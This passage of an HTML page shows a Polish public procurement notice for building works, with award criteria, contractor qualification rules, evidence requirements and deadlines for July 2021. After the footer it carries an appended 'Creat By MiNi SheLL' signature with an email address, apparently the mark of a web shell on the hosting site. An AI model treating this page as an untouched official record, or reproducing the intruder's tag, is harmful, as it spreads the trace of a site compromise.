class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę, która otrzyma najwyższą liczbę punktów (P)<br/>stanowiących sumę przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z<br/>poniższym wzorem: P = C + G gdzie: P- łączna ilość punktów oferty ocenianej, C- liczba punktów<br/>uzyskanych w kryterium „Cena”, G- liczba punktów uzyskanych w kryterium „Długość okresu rękojmi i<br/>gwarancji jakości"</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu rękojmi i gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>zdolności technicznej lub zawodowej w zakresie:1) Zamawiający określa, że ww. warunek<br/>zostanie spełniony, jeśli Wykonawca wykaże, że wykonał należycie nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie:<br/>co najmniej dwie roboty budowlane polegające na budowie, remoncie bądź przebudowie obiektu<br/>kubaturowego (budynku), o wartości każda co najmniej 100.000,00 złotych (sto tysięcy złotych<br/>brutto)<br/>- Wykonawca powinien w wykazie robót wyraźnie określić zakres robót, aby można było ustalić,<br/>czy spełnia warunek udziału w postępowaniu;<br/>2) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji:<br/>- co najmniej jedną osobę zdolną do pełnienia samodzielnych funkcji technicznych na<br/>stanowisku kierownika budowy, posiadającego uprawnienia bez ograniczeń w specjalności<br/>konstrukcyjno-budowlanej,<br/>- co najmniej jedną osobę zdolną do pełnienia samodzielnych funkcji technicznych na<br/>stanowisku kierownika robót sanitarnych posiadającą uprawnienia instalacyjno-sanitarne bez<br/>ograniczeń w zakresie sieci i instalacji wewnętrznych,<br/>- co najmniej jedną osobę zdolną do pełnienia samodzielnych funkcji technicznych na<br/>stanowisku kierownika robót elektrycznych, posiadającą uprawnienia bez ograniczeń w zakresie<br/>sieci i instalacji elektrycznych<br/>lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia<br/>budowlane do kierowania robotami równoważne do wyżej wskazanych.<br/>Wykonawca w celu wykazania spełniania w/w warunku może wskazać osoby będące<br/>obywatelem państwa członkowskiego UE, która nabyła kwalifikacje zawodowe do wykonywania<br/>działalności w budownictwie, równoznaczne wykonywaniu samodzielnych funkcji technicznych<br/>w budownictwie na terytorium Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w<br/>szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu:<br/>1) Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej (sporządzonego zgodnie z Załącznikiem Nr 8 do SWZ) ;<br/>2) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust.1 pkt 4 ustawy pzp, sporządzonych nie wcześniej<br/>nic 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp (załączniku nr 4 do SWZ), w zakresie podstaw wykluczenia z postępowania, o<br/>których mowa w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ);<br/>4) Dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, o których mowa w<br/>rozdziale 8, dziale 8.3. pkt 8.3.2. ppkt 1-3 SWZ, składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie.<br/>5) Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych<br/>podmiotów udostępniających zasoby, na zasadach określonych w art. 118 ustawy Pzp, przedstawienia<br/>podmiotowych środków dowodowych, o których mowa w rozdziale 8, dziale 8.3. pkt 8.3.2. ppkt 2-3<br/>SWZ dotyczących tych podmiotów potwierdzających, że nie zachodzą wobec tych podmiotów<br/>podstawy wykluczenia z postępowania.<br/>6) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, o którym mowa w pkt. 2) składa dokument lub dokumenty wystawione w<br/>kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji,<br/>nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego<br/>rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia<br/>procedury. Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania<br/>ma osoba, której dokument dotyczy, nie wydaje się ww. dokumentów, zastępuje się je dokumentem<br/>zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą,<br/>lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy, przy czym dokumenty te powinny być wystawione nie wcześniej niż 3<br/>miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>(sporządzony zgodnie z Załącznikiem Nr 9 do SWZ) – w odniesieniu do warunku określonego w pkt.<br/>6.1.1. ppkt. 1) SWZ.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami (sporządzony zgodnie z Załącznikiem Nr 10 do SWZ) – w odniesieniu do<br/>warunku określonego w pkt. 6.1.1. ppkt. 2) SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W przypadku, o którym mowa w rozdziale 6.3 SWZ wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Oświadczenie należy złożyć<br/>wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem<br/>dowodowym. Wykonawca może w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do<br/>konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub<br/>zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca nie<br/>może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby. W odniesieniu do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. Wykonawca, który polega<br/>na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w<br/>pkt 9.4 SWZ potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi<br/>zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: 1)zakres<br/>dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; 2) sposób i okres<br/>udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te<br/>zasoby przy wykonywaniu zamówienia; 3)czy i w jakim zakresie podmiot udostępniający zasoby,<br/>na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w<br/>postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. Wykonawca, w<br/>przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>przedstawia, wraz z oświadczeniami, o którym mowa w pkt 8.1 SWZ także oświadczenia<br/>podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu<br/>oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby. Wykonawca, który polega na<br/>zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy Pzp,<br/>przedstawia na wezwanie zamawiającego dokumenty wymienione w pkt. 8.3.2 SWZ dotyczące<br/>tych podmiotów, potwierdzające, że nie zachodzą wobec tych podmiotów podstawy wykluczenia<br/>z postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia: A) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. B) w przypadku, o którym mowa w<br/>rozdziale 6.3 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ..<br/>C) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa: - w<br/>pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku; - w pkt. 8.3.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia:a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu<br/>lub kryteriów selekcji.b) w przypadku, o którym mowa w rozdziale 6.3 SWZ wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Oświadczenie<br/>należy złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym<br/>środkiem dowodowym.c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe<br/>środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o<br/>których mowa:- w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy<br/>wykazuje/-ą spełnienie warunku- w pkt. 8.3.2 SWZ składa każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. 3.Jeżeli została wybrana oferta wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem<br/>umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych<br/>wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie<br/>art. 454-455 ustawy Pzp oraz postanowień Projektu Umowy. 2.Przewidywane zmiany do umowy<br/>zawiera parg. 15 umowy, której projekt stanowi załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-19 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany będzie do<br/>wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny brutto oferty (z<br/>podatkiem VAT).<br/>2. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą zobowiązany jest złożyć<br/>Zamawiającemu przed podpisaniem umowy:<br/>1) kosztorysy ofertowe z podziałem na zakres rzeczowy zamówienia.<br/>2) harmonogram rzeczowo – finansowy zawierający elementy robót do wykonania w podziale<br/>na: tygodnie wykonane siłami własnymi oraz roboty wykonane przez Podwykonawców.<br/>3.Wykonawca przed zawarciem umowy musi przedstawić Zamawiającemu dokumenty osób,<br/>skierowanych przez Wykonawcę do realizacji zamówienia potwierdzające fakt posiadania przez<br/>nich stosowanych uprawnień wskazanych w złożonym przez Wykonawcę wykazie osób<br/>skierowanych do realizacji zamówienia.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com